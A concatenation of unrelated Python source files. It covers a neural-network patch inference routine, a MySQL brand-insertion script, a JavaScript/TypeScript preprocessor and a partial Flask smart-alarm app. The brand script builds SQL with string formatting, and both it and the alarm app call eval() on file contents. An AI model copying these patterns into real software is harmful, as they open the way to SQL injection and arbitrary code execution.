batch_slices = self.patch_slices_list[i:i + self.batch_size]
for batch_idx, slices in enumerate(batch_slices):
self.input_patch_buffer[
batch_idx, 0, :, :, :] = input_chunk.cutout(slices[0]).array
end = time.time()
logging.debug('prepare %d input patches takes %3f sec' %
(self.batch_size, end - start))
start = end
# the input and output patch is a 5d numpy array with
# datatype of float32, the dimensions are batch/channel/z/y/x.
# the input image should be normalized to [0,1]
output_patch = self.patch_inferencer(self.input_patch_buffer)
end = time.time()
logging.debug('run inference for %d patch takes %3f sec' %
(self.batch_size, end - start))
start = end
for batch_idx, slices in enumerate(batch_slices):
# only use the required number of channels
# the remaining channels are dropped
# the slices[0] is for input patch slice
# the slices[1] is for output patch slice
offset = tuple(s.start for s in slices[1])
output_chunk = Chunk(
output_patch[batch_idx, :, :, :, :],
voxel_offset=offset,
voxel_size=input_chunk.voxel_size)
## save some patch for debug
#bbox = output_chunk.bbox
#if bbox.minpt[-1] < 94066 and bbox.maxpt[-1] > 94066 and \
# bbox.minpt[-2]<81545 and bbox.maxpt[-2]>81545 and \
# bbox.minpt[-3]<17298 and bbox.maxpt[-3]>17298:
# print('save patch: ', output_chunk.bbox)
# output_chunk.to_tif()
# #input_chunk.cutout(slices[0]).to_tif()
output_buffer.blend(output_chunk)
end = time.time()
logging.debug('blend patch takes %3f sec' % (end - start))
logging.debug("Inference of whole chunk takes %3f sec" %
(time.time() - chunk_time_start))
if self.mask_output_chunk:
output_buffer *= self.output_chunk_mask
        # theoretically, all the values of output_buffer should not be greater than 1
        # we use a slightly higher value here to accommodate numerical precision issues
np.testing.assert_array_less(output_buffer, 1.0001,
err_msg='output buffer should not be greater than 1')
if self.mask_myelin_threshold:
# currently only for masking out affinity map
assert output_buffer.shape[0] == 4
output_chunk = output_buffer.mask_using_last_channel(
threshold = self.mask_myelin_threshold)
if output_chunk.dtype == np.dtype('<f4'):
output_chunk = output_chunk.astype('float32')
return output_chunk
else:
return output_buffer
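# ---------------------------------------------------------------------------
# Illustrative sketch of the patch-geometry arithmetic used in __init__ above
# (hypothetical sizes, appended for clarity). For an aligned grid of patches,
# input_size = input_patch_stride * patch_num + input_patch_overlap, and the
# output chunk shrinks by output_offset on every side.
def _patch_geometry_example():
    input_patch_size = (20, 256, 256)
    output_patch_size = (16, 192, 192)
    output_patch_overlap = (4, 64, 64)
    output_crop_margin = output_patch_overlap  # the default when not masking
    patch_num = (2, 2, 2)
    output_patch_crop_margin = tuple((ips - ops) // 2 for ips, ops in zip(
        input_patch_size, output_patch_size))
    output_offset = tuple(opcm + ocm for opcm, ocm in zip(
        output_patch_crop_margin, output_crop_margin))
    input_patch_overlap = tuple(opcm * 2 + oo for opcm, oo in zip(
        output_patch_crop_margin, output_patch_overlap))
    input_patch_stride = tuple(ps - po for ps, po in zip(
        input_patch_size, input_patch_overlap))
    output_patch_stride = tuple(s - o for s, o in zip(
        output_patch_size, output_patch_overlap))
    input_size = tuple(pst * pn + po for pst, pn, po in zip(
        input_patch_stride, patch_num, input_patch_overlap))
    output_size = tuple(pst * pn + po - 2 * ocm for pst, pn, po, ocm in zip(
        output_patch_stride, patch_num, output_patch_overlap, output_crop_margin))
    # the output chunk is the input chunk cropped by output_offset on each side
    assert tuple(i - 2 * o for i, o in zip(input_size, output_offset)) == output_size
    return input_size, output_size, output_offset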
|
py | 7dfaf89d12620b1aae9eded935a6f39b8f94757a | #!/usr/bin/env/ python
# coding=utf-8
__author__ = 'Achelics'
__Date__ = '2017/05/04'
import MySQLdb
import json
from config_parser import Config
__BRAND_LIST = list()
__RAW_BRAND_LIST = list()
def __init_brand_list():
config_file = r"D:\Users\Achelics\liu_project\mutil_device_recongition\handle_brand_information\database_config.ini"
settion = "MyDataBase"
db_config = Config(config_file, settion)
url = db_config.get("url")
user = db_config.get("user")
pawd = db_config.get("pawd")
database = db_config.get("database")
try:
# open the database
db = MySQLdb.connect(url, user, pawd, database)
        # Use the cursor() method to get a database cursor.
cursor = db.cursor()
        # SQL: select all distinct brand names, longest first
sql_default = "SELECT DISTINCT(en_name) FROM iie_brand ORDER BY LENGTH(en_name) DESC"
        # execute the SQL statement
cursor.execute(sql_default)
        # fetch all records
default_results = cursor.fetchall()
for row in default_results:
__BRAND_LIST.append(str(row[0]).upper())
        # close the database connection
db.close()
except MySQLdb.Error, e:
print("MySQL Error:%s" % str(e))
def get_brand(raw_model_name, raw_brand_name):
brand_set = set()
with open(raw_model_name, "r") as model_f:
for line in model_f:
raw_data = json.dumps(line.strip("\n"), encoding="UTF-8", ensure_ascii=False)
new_line = eval(json.loads(raw_data))
model_brand = new_line["Brand"]
brand_set.add(str(model_brand).strip())
model_f.close()
with open(raw_brand_name, "r") as brand_f:
for line in brand_f:
raw_data = json.dumps(line.strip("\n"), encoding="UTF-8", ensure_ascii=False)
new_line = eval(json.loads(raw_data))
brand_brand = new_line["Brand"]
brand_set.add(str(brand_brand).strip())
brand_f.close()
brand_upper_list = set()
for brand in brand_set:
if str(brand).upper() not in brand_upper_list:
__RAW_BRAND_LIST.append(brand)
brand_upper_list.add(str(brand).upper())
def insert_brand(product_type):
config_file = r"D:\Users\Achelics\liu_project\mutil_device_recongition\handle_brand_information\database_config.ini"
settion = "MyDataBase"
db_config = Config(config_file, settion)
url = db_config.get("url")
user = db_config.get("user")
pawd = db_config.get("pawd")
database = db_config.get("database")
try:
# open the database
conn = MySQLdb.connect(url, user, pawd, database)
        # Use the cursor() method to get a database cursor.
cursor = conn.cursor()
for brand in __RAW_BRAND_LIST:
if str(brand).strip().upper() not in __BRAND_LIST:
print brand, product_type
default_sql = "insert into iie_brand(en_name, product_type) values('%s', '%s')" % (brand, product_type)
cursor.execute(default_sql)
        # commit the inserted rows
conn.commit()
        # close the cursor
cursor.close()
        # close the database connection
conn.close()
except MySQLdb.Error, e:
print("MySQL Error:%s" % str(e))
if __name__ == '__main__':
# raw_model_name = r"F:\mutil_result\device_tag_ll\brand_model\model.json"
# raw_brand_name = r"F:\mutil_result\device_tag_ll\brand_model\brand.json"
# product_type = "Monitor"
raw_model_name = r"F:\mutil_result\device_tag_ll\brand_model\Routermodel.json"
raw_brand_name = r"F:\mutil_result\device_tag_ll\brand_model\Routerbrand.json"
product_type = "Router"
__init_brand_list()
# print __BRAND_LIST
get_brand(raw_model_name, raw_brand_name)
# print __RAW_BRAND_LIST
insert_brand(product_type)
# print __BRAND_LIST
|
py | 7dfaf920a7af9c35bf64b822d1b2381761c102d2 | #!/usr/bin/env python
"""
A very basic JavaScript/TypeScript preprocessor.
Written by TheOnlyOne (@modest_ralts, https://github.com/LumenTheFairy).
"""
# Constants
DEFAULT_IN_DIR = "./"
DEFAULT_OUT_DIR = "./preprocessed/"
ID_CH = r'[\w$]'
import argparse
from sys import stderr
import os
from stat import S_IREAD, S_IRGRP, S_IROTH, S_IWUSR
import re
from enum import Enum, auto
# Setup logging
import logging
log = logging.getLogger('log')
formatter = logging.Formatter("[jprep: %(asctime)-15s] %(message)s")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
LOG_VERBOSE_LEVEL_NUM = 15
logging.addLevelName(LOG_VERBOSE_LEVEL_NUM, "VERBOSE")
def log_verbose(self, message, *args, **kws):
if self.isEnabledFor(LOG_VERBOSE_LEVEL_NUM):
self._log(LOG_VERBOSE_LEVEL_NUM, message, args, **kws)
logging.Logger.verbose = log_verbose
def parseArguments():
# Create argument parser
parser = argparse.ArgumentParser(description="Preprocesses the given JavaScript/TypeScript files.")
# Positional mandatory arguments
parser.add_argument("files", nargs='+', help="list of files to preprocess")
# Optional Arguments
parser.add_argument(
"-i", "--in_dir",
default=DEFAULT_IN_DIR,
help=f'directory the input files are relative to (defaults to "{DEFAULT_IN_DIR}")'
)
parser.add_argument(
"-o", "--out_dir",
default=DEFAULT_OUT_DIR,
help=f'directory in which to write the output files (defaults to "{DEFAULT_OUT_DIR}")'
)
parser.add_argument(
"-r", "--readonly",
action="store_true",
help='preprocessed files will be saved in readonly mode, to help prevent accidental edits'
)
parser.add_argument(
"-c", "--configuration",
default=None,
help=f'configuration file which holds definitions that stay in scope for all preprocessed files'
)
parser.add_argument(
"-b", "--build_off",
action="store_true",
help="only preprocess files that can be determined to need preprocessing"
)
parser.add_argument(
"-s", "--strict_define",
action="store_true",
help="makes it an error for a define to have no value or a condition not to check against a value, or when a condition uses a value that has not been defined in the current scope"
)
parser.add_argument("--verbose", action="store_true", help="display additional information during preprocessing")
# Print version
parser.add_argument("-v", "--version", action="version", version='%(prog)s - Version 1.0')
# Parse arguments
return parser.parse_args()
EXIT_CODE = 0
def atomic_streamed_file_process(in_path, out_path, process_func):
"""Effectively reads from the file at in_path, processes it with
process_func, and writes the result to out_path. However, if process_func
fails, we don't want to leave a partially written file on disk (especially
if that means the old file has already been discarded.) Yet, we still want to
be able to stream from one file to another to keep memory usage as low as
    possible. This function achieves both by writing the result to a
    temporary file; only if process_func succeeds does it replace the real
    output file. Otherwise, the temporary file is simply discarded.
    process_func is given a file open for reading and a file open for writing,
    and is expected to return a boolean indicating its success."""
with open(in_path, 'r') as in_file, open(out_path + '.temp', 'w') as out_file:
success = process_func(in_file, out_file)
if success:
if os.path.exists(out_path):
os.chmod(out_path, S_IWUSR|S_IREAD)
try:
os.replace(out_path + '.temp', out_path)
finally:
if args.readonly:
os.chmod(out_path, S_IREAD|S_IRGRP|S_IROTH)
else:
os.remove(out_path + '.temp')
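# Illustrative usage sketch for atomic_streamed_file_process (hypothetical
# file names, appended for clarity): the processing function receives the
# open input and output files and returns a boolean; returning False discards
# the temporary file and leaves any existing output untouched. Note that
# atomic_streamed_file_process reads the global `args` for the readonly flag,
# so it should only be called once the command-line arguments have been parsed.
def _copy_uppercased(in_file, out_file):
    for line in in_file:
        out_file.write(line.upper())
    return True
# atomic_streamed_file_process('src/example.js', 'out/example.js', _copy_uppercased)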
def should_preprocess(in_path, out_path, config_path, full_build):
"""Determines if a file should be preprocessed.
A file should be preprocessed for any of the following reasons:
- We are doing a full build
- The file has never been preprocessed before
- The file has been modified since the last time it was preprocessed
- The config file has been modified since the last run
- This script has been modified since the last time it ran"""
if full_build:
return True
if not os.path.exists(out_path):
return True
if os.path.getmtime(in_path) > os.path.getmtime(out_path):
return True
if os.path.getmtime(__file__) > os.path.getmtime(out_path):
return True
if config_path and (os.path.getmtime(config_path) > os.path.getmtime(out_path)):
return True
return False
class PreprocessException(Exception):
"""An exception thrown by preprocess which indicates a parse error that should be reported"""
def __init__(self, message, local_vars):
self.message = message
self.l = local_vars
def __str__(self):
if self.l.scan == 0:
return f'{self.message}\nLine {self.l.prev_line_num}: {self.l.prev_line}'
else:
return f'{self.message}\nLine {self.l.line_num}: {self.l.in_line}'
__repr__ = __str__
class DefinitionEntry:
"""Holds the value and possible choices for a defined name"""
def __init__(self, value, choices):
self.value = value
self.choices = choices
class IfState(Enum):
If = auto()
ElseIf = auto()
Else = auto()
class IfEntry:
"""Holds info about the current if directives"""
def __init__(self, scope_depth):
self.state = IfState.If
self.seen_true = False
self.in_true = False
self.scope_depth = scope_depth
class ParsingEnvironment:
"""Holds all definitions in a stack of scopes, and keeps track of nested if directives"""
def push_scope(self):
"""Enter a new scope"""
self.scopes.append({})
def pop_scope(self, ends_branch=False):
"""Leave the current scope"""
if ((not ends_branch
and self.in_if()
and len(self.scopes) <= self.get_if_starting_scope_depth())
or len(self.scopes) <= 1):
raise PreprocessException('Attempted to leave final scope.', self.l)
self.scopes.pop()
def define(self, name, value=None, choices=None):
"""Adds or overwrites the definition of name in the current scope"""
self.scopes[-1][name] = DefinitionEntry(value, choices)
def undefine(self, name):
"""Removes a definition of name from the current scope"""
if name not in self.scopes[-1]:
raise PreprocessException(f'Cannot undefine "{name}"; it does not exist in the current scope.', self.l)
del self.scopes[-1][name]
def lookup(self, name):
"""Gets the entry for the most deeply nested definition of name, if there are any"""
for scope in reversed(self.scopes):
if name in scope:
return scope[name]
return None
def get_scope_depth(self):
return len(self.scopes)
def get_if_depth(self):
return len(self.if_stack)
def push_if(self):
"""Enter a new if directive"""
self.if_stack.append(IfEntry(len(self.scopes)))
def pop_if(self):
"""Leave the current if directive"""
self.if_stack.pop()
def in_if(self):
return bool(self.if_stack)
def set_if_branch(self, flag):
"""Set the current if directive's truthfulness"""
self.if_stack[-1].in_true = flag
self.if_stack[-1].seen_true |= flag
def set_if_state(self, state):
self.if_stack[-1].state = state
def get_if_state(self):
return self.if_stack[-1].state
def get_seen_true(self):
return self.if_stack[-1].seen_true
def get_in_true(self):
for entry in self.if_stack:
if not entry.in_true:
return False
return True
def get_if_starting_scope_depth(self):
return self.if_stack[-1].scope_depth
def __init__(self):
self.scopes = []
self.if_stack = []
self.push_scope()
self.l = None
@classmethod
def from_base_env(cls, env):
result = cls()
result.scopes = env.scopes
return result
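# Illustrative sketch of ParsingEnvironment scoping (hypothetical names,
# appended for clarity): a definition in an inner scope shadows the outer one
# and disappears when the scope is popped; lookup() returns None for names
# that are not defined in any scope.
def _environment_example():
    env = ParsingEnvironment()
    env.define('PLATFORM', 'web', choices=['web', 'desktop'])
    env.push_scope()
    env.define('PLATFORM', 'desktop')
    assert env.lookup('PLATFORM').value == 'desktop'
    env.pop_scope()
    assert env.lookup('PLATFORM').value == 'web'
    assert env.lookup('UNDEFINED_NAME') is None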
# precompiled regexes
whitespace_re = re.compile(r'(?!\s)')
identifier_re = re.compile(ID_CH + '+' + r'(?!' + ID_CH + ')')
string_re = {}
string_re["'"] = re.compile(r"(?<!\\)'")
string_re['"'] = re.compile(r'(?<!\\)"')
end_comment_re = re.compile(r'\*/')
template_literal_re = re.compile(r'(?<!\\)`|(?<!\\)\$\{')
main_loop_re = re.compile(r'/\*\$|"|\'|//|/\*|\{|\}|`')
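# Illustrative example of the directive syntax recognized by the parser below
# (hypothetical input). Directives live in comments that start with the /*$
# marker matched by main_loop_re; branches whose condition is false are
# skipped from the output:
#
#   /*$ define PLATFORM = web < web, desktop */
#   /*$ if PLATFORM = web */
#   const storage = window.localStorage;
#   /*$ else */
#   const storage = new DesktopStorage();
#   /*$ fi */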
def same_text(s1, s2):
"""True if both strings are the same, ignoring case."""
# note, unicodedata.normalize is a good idea to get this to work all the time,
# but this is only used here to compare against our simple directive names
return s1.casefold() == s2.casefold()
def do_preprocess(in_file, out_file, env):
global EXIT_CODE
class ParseMode(Enum):
Output = auto()
Skip = auto()
# black python magic
# will make it so the print(l) prints all local variables
from itertools import chain
class Debug(type):
def __str__(self):
return '\n'.join(
['preprocess local variables:'] + [
f' {var} = {val!r}'
for (var, val)
in chain(self.__dict__.items(),
{'in_line[scan:]': self.in_line[self.scan:]}.items())
if not var.startswith('__')
])
__repr__ = __str__
# This is a bit of an ugly trick to avoid putting 'nonlocal' in any nested functions
# that only write to these (which I find easy to forget, and hard to track down; not a good combination)
class LocalVariables(metaclass=Debug):
# holds the line that was most recently read from in_file
in_line = ''
# current line number in in_file; 1 based
line_num = 0
# all characters in in_line before emit have been written to out_line or have been skipped
emit = 0
# all characters in in_line before scan have been parsed
scan = 0
# holds any partial line output. This is only written to if part of the line is skipped;
# if emit is 0 at the end of a line, in_line can be written directly to out_file
out_line = ''
# current parse mode
parse_mode = ParseMode.Output
# for error reporting...
prev_line = ''
prev_line_num = 0
l = LocalVariables
env.l = l
mode_stack = []
# holds the scope depth at each template level
template_literal_stack = []
def push_mode(mode):
mode_stack.append(l.parse_mode)
l.parse_mode = mode
def pop_mode():
l.parse_mode = mode_stack.pop()
#----------------------------------------------------------------------------------------------
# Handle input and output and line transitions
def read_line():
l.prev_line = l.in_line
l.prev_line_num = l.line_num
l.in_line = in_file.readline()
l.line_num += 1
l.emit = 0
l.scan = 0
l.out_line = ''
def write_output():
if l.emit == 0:
out_file.write(l.in_line)
else:
output = l.out_line + l.in_line[l.emit:]
if not output.isspace():
out_file.write(l.out_line + l.in_line[l.emit:])
def append_output():
l.out_line += l.in_line[l.emit:l.scan]
l.emit = l.scan
def move_to_next_line_if_necessary():
if l.scan > len(l.in_line):
raise Exception('Internal error')
if l.in_line[l.scan:] == '\n' or l.in_line[l.scan:] == '':
write_output()
read_line()
#----------------------------------------------------------------------------------------------
# Parsing utility
def parse_any(count=1):
if l.parse_mode == ParseMode.Skip:
append_output()
l.emit = l.scan + count
l.scan += count
move_to_next_line_if_necessary()
def parse_line():
if l.parse_mode == ParseMode.Skip:
l.emit = len(l.in_line) - 1
l.scan = len(l.in_line) - 1
move_to_next_line_if_necessary()
def parse_until(regex):
m = None
while not m and l.in_line:
m = regex.search(l.in_line[l.scan:])
if m:
parse_any(m.end(0))
else:
parse_line()
#----------------------------------------------------------------------------------------------
# Error reporting
def report_error(message):
raise PreprocessException(message, l)
def report_choice_inclusion_error(name, value, choices):
choices_format = ", ".join(map(lambda c: f'"{c}"', choices))
report_error(f'"{value}" is not one of the required choices for "{name}": [{choices_format}]')
#----------------------------------------------------------------------------------------------
# Parsing atoms
def try_parse_chars(s):
if l.in_line[l.scan:].startswith(s):
parse_any(len(s))
return True
return False
def parse_chars(s, error_message):
if not try_parse_chars(s):
report_error(error_message)
def try_parse_identifier():
m = identifier_re.match(l.in_line[l.scan:])
if not m:
return None
parse_any(m.end(0))
return m[0]
def parse_identifier(error_message):
result = try_parse_identifier()
if not result:
report_error(error_message)
return result
def parse_whitespace():
parse_until(whitespace_re)
def parse_string(quote):
parse_any(1)
parse_until(string_re[quote])
def parse_line_comment():
parse_line()
def parse_block_comment():
parse_until(end_comment_re)
def parse_template_literal():
parse_any(1)
parse_until(template_literal_re)
if l.in_line[l.scan-1] != '`':
            template_literal_stack.append([env.get_scope_depth(), env.get_if_depth()])
#----------------------------------------------------------------------------------------------
# Parsing directives
def parse_note():
parse_until(end_comment_re)
def parse_define():
name = parse_identifier('Expected a name at the beginning of the "define" directive.')
parse_whitespace()
value = None
choices = None
if try_parse_chars('='):
parse_whitespace()
value = parse_identifier('Expected a value after "=" in the "define" directive.')
parse_whitespace()
if try_parse_chars('<'):
choices = []
while True:
parse_whitespace()
choice = try_parse_identifier()
if choice:
choices.append(choice)
elif not choices:
report_error('There must be at least one choice after "<" in the "define" directive.')
parse_whitespace()
if not try_parse_chars(','):
break
parse_whitespace()
if not try_parse_chars('*/'):
report_error('Only whitespace allowed at the end of a "define" directive.')
if args.strict_define and not value:
report_error('definitions must set a value when using --strict_define')
old_definition = env.lookup(name)
if old_definition:
if old_definition.choices:
if choices:
report_error(f'"{name}" already has a set of choices.')
else:
choices = old_definition.choices
if choices:
if not value:
report_error('A value must be given for a definition with choices.')
if value not in choices:
report_choice_inclusion_error(name, value, choices)
env.define(name, value, choices)
def parse_undefine():
name = parse_identifier('Expected a name at the beginning of the "undefine" directive.')
parse_whitespace()
if not try_parse_chars('*/'):
            report_error('Only whitespace allowed at the end of an "undefine" directive.')
env.undefine(name)
def parse_condition(directive):
name = parse_identifier(f'Expected a name at the beginning of the "{directive}" directive.')
parse_whitespace()
value = None
if try_parse_chars('='):
parse_whitespace()
value = parse_identifier(f'Expected a value after "=" in the "{directive}" directive.')
parse_whitespace()
if not try_parse_chars('*/'):
report_error(f'Only whitespace allowed at the end of a "{directive}" directive.')
return [name, value]
def get_branch_parse_mode():
if env.get_in_true():
return ParseMode.Output
else:
return ParseMode.Skip
def parse_if():
[name, value] = parse_condition('if')
definition = env.lookup(name)
env.push_scope()
env.push_if()
if not definition:
if args.strict_define:
report_error('condition value must be defined when using --strict_define')
env.set_if_branch(False)
else:
if args.strict_define and not value:
                report_error('condition must test against a value when using --strict_define')
if definition.choices and not value in definition.choices: # False even if value is None
report_choice_inclusion_error(name, value, definition.choices)
if definition.value == value:
env.set_if_branch(True)
else:
env.set_if_branch(False)
return get_branch_parse_mode()
def parse_elseif():
if not env.in_if():
report_error('"elseif" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
if env.get_if_state() == IfState.Else:
report_error('"elseif" directive after "else".')
[name, value] = parse_condition('elseif')
pop_mode()
definition = env.lookup(name)
env.set_if_state(IfState.ElseIf)
env.pop_scope(True)
env.push_scope()
if not definition:
env.set_if_branch(False)
else:
if definition.choices and not value in definition.choices: # False even if value is None
report_choice_inclusion_error(name, value, definition.choices)
if env.get_seen_true():
env.set_if_branch(False)
elif definition.value == value:
env.set_if_branch(True)
else:
env.set_if_branch(False)
return get_branch_parse_mode()
def parse_else():
if not env.in_if():
report_error('"else" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
if env.get_if_state() == IfState.Else:
report_error('"else" directive after "else".')
parse_whitespace()
if not try_parse_chars('*/'):
            report_error('Only whitespace allowed at the end of an "else" directive.')
pop_mode()
env.set_if_state(IfState.Else)
env.pop_scope(True)
env.push_scope()
env.set_if_branch(not env.get_seen_true())
return get_branch_parse_mode()
def parse_fi():
if not env.in_if():
report_error('"fi" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
parse_whitespace()
if not try_parse_chars('*/'):
report_error('Only whitespace allowed at the end of a "fi" directive.')
pop_mode()
env.pop_if()
env.pop_scope(True)
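    # Directives are written as /*$ <name> ... */ block comments; the identifier after the
    # opening marker selects the handler (note, define, undefine, if, elseif, else, fi).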
def parse_directive():
result = False
new_mode = None
push_mode(ParseMode.Skip)
parse_any(3)
parse_whitespace()
directive = parse_identifier('Directives must start with an identifier.')
parse_whitespace()
if same_text(directive, 'note'):
parse_note()
elif same_text(directive, 'define'):
parse_define()
elif same_text(directive, 'undefine'):
parse_undefine()
elif same_text(directive, 'if'):
new_mode = parse_if()
elif same_text(directive, 'elseif'):
new_mode = parse_elseif()
elif same_text(directive, 'else'):
new_mode = parse_else()
elif same_text(directive, 'fi'):
parse_fi()
else:
            report_error(f'"{directive}" is not a recognized directive.')
pop_mode()
if new_mode:
push_mode(new_mode)
return result
def handle_close_brace():
if template_literal_stack and (template_literal_stack[-1][0] == env.get_scope_depth()):
            if env.in_if() and (env.get_if_depth() != template_literal_stack[-1][1]):
report_error('Reached the end of a template expression in the middle of an if directive branch.')
template_literal_stack.pop()
parse_template_literal()
else:
env.pop_scope()
parse_any(1)
def parse_file():
while l.in_line:
m = main_loop_re.search(l.in_line[l.scan:])
if m:
parse_any(m.start(0))
if m[0] in ["'", '"']:
parse_string(l.in_line[l.scan])
elif m[0] == '`':
parse_template_literal()
elif m[0] == '//':
parse_line_comment()
elif m[0] == '/*':
parse_block_comment()
elif m[0] == '{':
env.push_scope()
parse_any(1)
elif m[0] == '}':
handle_close_brace()
elif m[0] == '/*$':
parse_directive()
else:
parse_line()
try:
read_line()
parse_file()
if env.in_if():
            report_error('Reached the end of the file in the middle of an if directive branch.')
except PreprocessException as e:
log.error(e)
EXIT_CODE = -1
return False
return True
global_env = ParsingEnvironment()
def show_global_env():
return '\n'.join(
['Configuration:'] + [
f' {name} = {entry.value}'
for (name, entry)
in global_env.scopes[0].items()
])
def preprocess(in_file, out_file):
return do_preprocess(in_file, out_file, ParsingEnvironment.from_base_env(global_env))
def preprocess_config(config_path):
class NullOut():
def write(self, s):
pass
out_file = NullOut()
with open(config_path, 'r') as in_file:
return do_preprocess(in_file, out_file, global_env)
if __name__ == '__main__':
# Parse the arguments
args = parseArguments()
# Verbose flag takes effect
if args.verbose:
log.setLevel(LOG_VERBOSE_LEVEL_NUM)
log.verbose('Starting.')
# Create the output directory if it does not exist
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
log.verbose(f'Output directory "{args.out_dir}" created.')
# Read configuration file if there is one
if args.configuration:
preprocess_config(args.configuration)
log.verbose(show_global_env())
for filename in args.files:
in_path = os.path.join(args.in_dir, filename)
out_path = os.path.join(args.out_dir, filename)
if should_preprocess(in_path, out_path, args.configuration, not args.build_off):
atomic_streamed_file_process(in_path, out_path, preprocess)
log.verbose(f'Preprocessed "{filename}".')
else:
log.verbose(f'Skipping "{filename}"; it is already up-to-date.')
exit(EXIT_CODE)
|
py | 7dfaf9de6951c4481234645794d9bd39bf034201 | """
This module is the main module that contains the smart-alarm system.
What it does is extract information from JSON files acquired using their corresponding APIs.
We can set alarms, read notifications, and delete them.
Functions:
hhmm_to_seconds(alarm_time) -- convert a HH:MM:SS time string into seconds
announce(announcement) -- read an announcement out loud using text-to-speech
title_content() -- build the title/content entries for the alarms and notifications
enter_event() -- enter an alarm in the scheduler if it is set for today
storing_alarms() -- store new alarms in, and remove cancelled ones from, the alarms json file
set_default_notifications() -- build the default notifications from the news, weather and covid data
news() -- we extract covid-related information from the news json, assign it to variables and return it
weather() -- we extract information from the weather json, assign it to variables and return it
public_health_exeter() -- we extract information from the public health exeter json, assign it to variables and return it
public_health_england() -- we extract information from the public health england json, assign them to variables and return them
main_scheduler() -- this function is run in a loop by the flask module
"""
from datetime import datetime, date
import time
import sched
import logging
import json
from flask import request, Flask, render_template
import pyttsx3
from api_requests import news_request,weather_request
from api_requests import public_health_exeter_req, public_health_england_req
#initiate scheduler
s = sched.scheduler(time.time, time.sleep)
app = Flask(__name__)
#initiate text-to-speech to be used in announcements
engine = pyttsx3.init()
#date and time will be used to check for invalid alarms set
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
# Get today's date
today = date.today()
#convert the time interval between the alarm and the current time into seconds
def hhmm_to_seconds(alarm_time: str) -> int:
"Convert time argument and current time into seconds, then return the delay time."
split_hhmm = list(alarm_time.split(':'))
hours_to_secs = int(split_hhmm[0]) * 3600
mins_to_secs = int(split_hhmm[1]) * 60
secs = int(split_hhmm[2])
hhmm_to_secs = hours_to_secs + mins_to_secs + secs
logging.info("alarm time delay calculated")
return hhmm_to_secs
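# Example: hhmm_to_seconds("01:30:00") returns 5400 (1*3600 + 30*60 + 0).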
#this will enable text-to-speech to read the announcements out loud
def announce(announcement:str):
"Enable text-to-speech, and use it in the announcement."
try:
engine.endLoop()
except:
logging.error('PyTTSx3 Endloop error')
engine.say(announcement)
engine.runAndWait()
#this will regularly update the notifications and alarms
def title_content() -> list:
"Assign title and content to alarms and notifications."
#appends updated alarms json file so that it is displayed in the html
alarms = []
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
value_counter = 0
alarms_in_json = alarms_file["data"]
for key in list(alarms_in_json.keys()):
time = list(alarms_in_json.values())[value_counter].replace("T", " ")
alarms.append({"title": "ALARM LABEL: "+key,"content":"ALARM SET: "+time})
value_counter = value_counter + 1
    now = datetime.now()
    # Build the notifications on every call so the return value is never unbound;
    # the branch below only logs the regular hourly refresh.
    notifications = set_default_notifications()
    if int(now.minute) == 0:
        logging.info("default notifications set")
    return notifications, alarms
#if the alarm is set for today it will enter it in the scheduler
def enter_event():
"Enter alarm in the scheduler."
#alarms = title_content()
notifs = set_default_notifications()
notifs = notifs[3]["content"]
#convert alarm_time to a delay
delay = hhmm_to_seconds(ALARM_SPLIT_TIME) - hhmm_to_seconds(current_time)
s.enter(int(delay), 1, announce, ["COVID RATES IN EXETER "+notifs,])
logging.info("alarm set")
#<<<COME BACK TO THIS LATER!!!: cancelling events>>>-------------------------------------------
#with open("json_files/events.json","r") as f:
#events_file = json.load(f)
#f.close()
#adds new alarm
#events_file[alarm_text] = "why"
#with open("json_files/events.json","w") as updated_file:
#json.dump(events_file, updated_file, indent=2)
#updated_file.close()
#this will store and remove alarms from the alarms.json file
def storing_alarms():
"Store alarm in alarms json file to enable to add/remove alarms."
global ALARM_SPLIT_TIME, ALARM_TEXT
alarm_time = request.args.get("alarm")
ALARM_TEXT = request.args.get("two")
if alarm_time:
alarm_split_date_time = alarm_time.split("T")
alarm_split_date = str(alarm_split_date_time[0])
ALARM_SPLIT_TIME = str(alarm_split_date_time[1]) + ":00"
year = int(alarm_split_date[:4])
month = int(alarm_split_date[5:7])
day = int(alarm_split_date[-2:])
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
#check if the alarm time set has passed
if datetime(year,month,day,int(ALARM_SPLIT_TIME[:2]),int(ALARM_SPLIT_TIME[-5:-3])) < now:
logging.error("Alarm time set has passed")
#if the alarm set is for today enter in the scheduler
elif alarm_split_date == str(today):
enter_event()
if ALARM_TEXT in list(alarms_file["data"].keys()):
#counter used to access the corresponding value of the key
x_counter=1
#if the labels are duplicated, just add a number in the label
while ALARM_TEXT in list(alarms_file["data"].keys()):
x_counter = x_counter+1
ALARM_TEXT = ALARM_TEXT+str(x_counter)
logging.info("existing label detected")
if datetime(year,month,day,int(ALARM_SPLIT_TIME[:2]),int(ALARM_SPLIT_TIME[-5:-3])) >= now:
#adds new alarm
alarms_file["data"][ALARM_TEXT] = alarm_time
#updates alarms_json
with open("json_files/alarms.json","w") as updated_file:
json.dump(alarms_file, updated_file, indent=2)
updated_file.close()
def set_default_notifications():
"Set the notifications to default notifications."
    #extract information from corresponding json files
title1, content1, title2, content2 = news()
weather_city, weather_temp, weather_des, weather_pre, weather_hum = weather()
date1, area_name1, new_cases1, cumulative_cases1 = public_health_exeter()
date2, area_name2, new_cases2, cumulative_cases2 = public_health_england()
    weather_temp = str(weather_temp)
weather_pre = str(weather_pre)
weather_hum = str(weather_hum)
#assign the extracted information from APIs to variables
title1 = "NEWS: "+title1
title2 = "NEWS: "+title2
title3 = "WEATHER (right now) : "+weather_city
title4 = "PUBLIC HEALTH ENGLAND--YESTERDAY'S COVID-19 RATES: {area}".format(area=area_name1)
title5 = "PUBLIC HEALTH ENGLAND--YESTERDAY'S COVID-19 RATES: {area}".format(area=area_name2)
content3_1 = "TEMPERATURE(Kelvin): {temp}, DESCRIPTION: {des},"
content3_2 = " PRESSURE(hPa): {pre}, HUMIDITY(%): {hum}"
content3 = content3_1+content3_2
